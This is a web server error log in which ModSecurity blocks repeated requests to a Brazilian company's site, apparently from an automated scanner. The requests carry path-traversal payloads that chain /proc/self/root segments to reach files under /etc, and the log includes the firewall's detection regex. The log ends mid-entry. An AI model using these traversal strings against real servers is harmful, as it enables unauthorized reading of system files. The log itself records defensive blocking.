[Mon Mar 16 09:13:45.982347 2026] [:error] [pid 10709:tid 140411666392832] [client 74.7.241.46:50356] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfz-RXjF1vJNtV6CWrj8wAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:13:48.459210 2026] [:error] [pid 10772:tid 140411725141760] [client 74.7.241.46:50362] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfz_P9ocpUE4ed4uDzXtAAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:13:58.643946 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.241.46:35396] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf0BglT9VtDQc7bgUyVvQAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:14:20.206129 2026] [:error] [pid 21946:tid 140411590858496] [client 74.7.243.203:45850] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf0HHbQATo66fKoS7w25gAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:14:21.551466 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.243.203:49066] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf0HZqj1wV0Si-OkefTYwAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:14:22.859267 2026] [:error] [pid 11972:tid 140411607643904] [client 74.7.243.203:49072] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf0Hpqj1wV0Si-OkefTZAAAABA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:14:27.330953 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.243.203:49078] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf0I7ysWC90G-1nBrAwawAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:14:31.430344 2026] [:error] [pid 10772:tid 140411590858496] [client 74.7.241.46:52700] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf0J_9ocpUE4ed4uDzX2QAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:14:32.737010 2026] [:error] [pid 11972:tid 140411641214720] [client 74.7.241.46:36454] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf0KJqj1wV0Si-OkefTagAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:14:39.731479 2026] [:error] [pid 21946:tid 140411565680384] [client 74.7.243.203:49088] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf0L3bQATo66fKoS7w29gAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:14:52.975587 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.241.46:36460] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf0PLABkC4fWIHEf8HVxQAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:15:08.515373 2026] [:error] [pid 10831:tid 140411557287680] [client 74.7.241.46:48636] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf0TI6lpbStxTqkSktZdQAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:15:13.151266 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.241.46:43442] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf0Uf9ocpUE4ed4uDzX8wAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:15:27.932568 2026] [:error] [pid 10651:tid 140411565680384] [client 74.7.241.46:43456] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf0X7ysWC90G-1nBrAwlQAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:16:57.668054 2026] [:error] [pid 10831:tid 140411565680384] [client 74.7.241.46:40176] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf0uY6lpbStxTqkSktZ9wAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:17:04.483201 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.241.46:45022] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf0wLysWC90G-1nBrAwqwAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:17:05.187231 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.243.203:59484] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf0wY6lpbStxTqkSktZ_gAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:17:06.473702 2026] [:error] [pid 11972:tid 140411565680384] [client 74.7.243.203:44420] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf0wpqj1wV0Si-OkefT_QAAABU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:17:08.803531 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.243.203:44428] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf0xJqj1wV0Si-OkefUAwAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:17:16.219915 2026] [:error] [pid 10709:tid 140411674785536] [client 74.7.243.203:36552] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf0zBXjF1vJNtV6CWrkOgAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:17:17.503064 2026] [:error] [pid 11972:tid 140411548894976] [client 74.7.243.203:36554] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf0zZqj1wV0Si-OkefUEAAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:17:19.769897 2026] [:error] [pid 21533:tid 140411725141760] [client 74.7.243.203:36562] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf0znjZBu2q05ozVU9BGAAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:17:23.255021 2026] [:error] [pid 32654:tid 140411733534464] [client 74.7.243.203:42440] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag 